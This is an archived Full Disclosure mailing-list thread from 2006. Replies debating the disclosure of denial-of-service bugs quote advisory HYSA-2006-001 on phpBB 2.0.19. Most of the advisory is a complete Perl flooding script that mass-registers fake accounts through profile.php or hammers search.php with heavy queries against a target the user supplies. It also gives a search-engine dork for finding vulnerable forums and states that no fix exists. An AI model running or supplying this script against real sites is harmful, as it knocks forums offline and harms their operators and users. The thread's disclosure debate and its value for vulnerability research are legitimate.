Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
From: "Edward Pearson" <Ed () unityitservices co uk>
Date: Thu, 26 Jan 2006 15:46:08 -0000

No, I do believe full-disclosure to be the best method. In the case of DoS attacks, I think a point should be made of 
making sure the vendor is informed, and a patch available before disclosed, then I beleive itw down to the author's 
discretion when he releases the exploit, even if its a PoC.
   
________________________________

From: poo [mailto:skodliv () gmail com] 
Sent: 26 January 2006 11:31
To: Edward Pearson
Cc: full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability


so what youre saying is that DoS exploits shouldnt be disclosed?


On 1/25/06, Edward Pearson <Ed () unityitservices co uk> wrote: 

        The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their 
parent's basement and call themselves "h4x0rz". 
          
________________________________

        From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On 
Behalf Of h4cky0u
        Sent: 25 January 2006 14:44
        To: full-disclosure () lists grok org uk
        Cc: bugtraq () securityfocus com
        Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
        
         
        
        ------------------------------------------------------
              HYSA-2006-001 h4cky0u.org <http://h4cky0u.org/>  Advisory 010
        
        ------------------------------------------------------
        Date - Wed Jan 25 2006
        
        
        
        TITLE:
        ======
        
        phpBB 2.0.19 search.php and profile.php DOS Vulnerability
        
        
        SEVERITY:
        =========
        
        High
        
        
        SOFTWARE:
        =========
        
        phpBB 2.0.19 and prior
        
        
        INFO:
        
        
        =====
        
        phpBB is a high powered, fully scalable, and highly customizable 
        Open Source bulletin board package. phpBB has a user-friendly 
        interface, simple and straightforward administration panel, and 
        helpful FAQ. Based on the powerful PHP server language and your 
        
        choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
        phpBB is the ideal free community solution for all web sites.
        
        Support Website : 
        http://www.phpbb.com <http://www.phpbb.com/> 
        
        
        
        BUG DESCRIPTION:
        ================
        
        The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
        
        
        http://h4cky0u.org/viewtopic.php?t=637
        <http://h4cky0u.org/viewtopic.php?t=637> 
        
        This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest 
version too. The bug resides in the following two scripts-
        
        profile.php << By registering as many users as you can. 
        
        search.php  << By searching in a way that the db cannot understand.
        
        
        Proof Of Concept Code:
        ======================
        
        #!/usr/bin/perl 
        ####################################### 
        ##   Recoded by: mix2mix and Elioni of 
        http://ahg-khf.org <http://ahg-khf.org/> 
        ##   And h4cky0u Security Forums (
        http://h4cky0u.org <http://h4cky0u.org/> ) 
        ##   Name: phpBBDoSReloaded
        ##   Original Author: HaCkZaTaN of Neo Security Team 
        
        ##   Tested on phpBB 2.0.19 and earlier versions
        ##   Ported to perl by g30rg3_x
        ##   Date: 25/01/06
        ####################################### 
        use IO::Socket; 
        
        ## Initialized X 
        $x = 0; 
        
        print q(
        
          phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
          Recoded by Albanian Hackers Group &
          h4cky0u Security Forums       
        
        ); 
        print q(Host |without-> http://www.| ); 
        
        $host = <STDIN>; 
        chop ($host); 
        
        print q(Path |example-> /phpBB2/ or /| ); 
        $pth = <STDIN>; 
        chop ($pth); 
        
        print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
        
        $type = <STDIN>; 
        chop ($type); 
        
        ## Tipi për regjistrim 
        if($type == 1){ 
        
        ## User Loop for 9999 loops (enough for Flood xDDDD) 
        while($x != 9999) 
        { 
        
        ## Antari që regjistrohet automatikishtë "X" 
        
        $uname = "username=AHG__" . "$x"; 
        
        ## Emaili që regjistrohet ne bazën "X" 
        $umail = "&email=AHG__" . "$x"; 
        
        $postit = "$uname"."$umail"."%40ahg-
        
crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit
        
        "; 
        
        $lrg = length $postit; 
        
        my $sock = new IO::Socket::INET ( 
                                         PeerAddr => "$host", 
                                         PeerPort => "80", 
        
        
                                         Proto => "tcp", 
                                        ); 
        die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; 
        
        ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
        
        print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
        print $sock "Host: $host\n"; 
        print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, 
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
        
        print $sock "Referer: $host\n"; 
        print $sock "Accept-Language: en-us\n"; 
        print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
        print $sock "Accept-Encoding: gzip, deflate\n"; 
        
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
        print $sock "Connection: Keep-Alive\n"; 
        print $sock "Cache-Control: no-cache\n"; 
        
        print $sock "Content-Length: $lrg\n\n"; 
        print $sock "$postit\n"; 
        close($sock); 
        
        ## Print a "+" for every loop 
        syswrite STDOUT, "+"; 
        
        $x++; 
        } 
        
        
        
        ## Tipi 2-shë për Kërkim(Flood) 
        } 
        elsif ($type == 2){ 
        
        while($x != 9999) 
        { 
        ## Final Search String to Send 
        $postit = 
"search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
 
        
        
        ## Posit Length 
        $lrg = length $postit; 
        
        ## Connect Socket with Variables Provided By User 
        my $sock = new IO::Socket::INET ( 
                                         PeerAddr => "$host", 
        
        
                                         PeerPort => "80", 
                                         Proto => "tcp", 
                                        ); 
        die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 
        
        
        ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums 
        print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
        print $sock "Host: $host\n"; 
        
        
        print $sock "Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
        print $sock "Referer: $host\n"; 
        print $sock "Accept-Language: en-us\n"; 
        
        print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
        print $sock "Accept-Encoding: gzip, deflate\n"; 
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8
        
        ) Gecko/20050511 Firefox/1.0.4\n"; 
        print $sock "Connection: Keep-Alive\n"; 
        print $sock "Cache-Control: no-cache\n"; 
        print $sock "Content-Length: $lrg\n\n"; 
        print $sock "$postit\n"; 
        
        close($sock); 
        
        ## Print a "+" for every loop 
        syswrite STDOUT, "+"; 
        
        ## Increment X in One for every Loop 
        $x++; 
        } 
        }else{ 
        ## STF??? Qfarë keni Shtypur 
           die "Mundësia nuk Lejohet +_-???\n"; 
        
        }
        
        
        FIX:
        ====
        
        No fix available as of date.
        
        
        GOOGLEDORK:
        ===========
        
        "Powered by phpBB" 
        
        
        CREDITS:
        ========
        
        - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.
        
        
        
        - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -
        
        Web : 
        http://ahg-khf.org <http://ahg-khf.org/> 
        
        mail : webmaster at ahg-khf dot org
        
        
        
        - Co Researcher -
        
        h4cky0u of h4cky0u Security Forums.
        
        mail : h4cky0u at gmail dot com
        
        web : 
        http://www.h4cky0u.org <http://www.h4cky0u.org/> 
        
        
        ORIGINAL ADVISORY:
        ==================
        
        
        http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
        
        
        -- 
        http://www.h4cky0u.org <http://www.h4cky0u.org/> 
        (In)Security at its best... 

        _______________________________________________ 
        Full-Disclosure - We believe in it.
        Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
        Hosted and sponsored by Secunia - http://secunia.com/
        
        




-- 
smile tomorrow will be worse 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]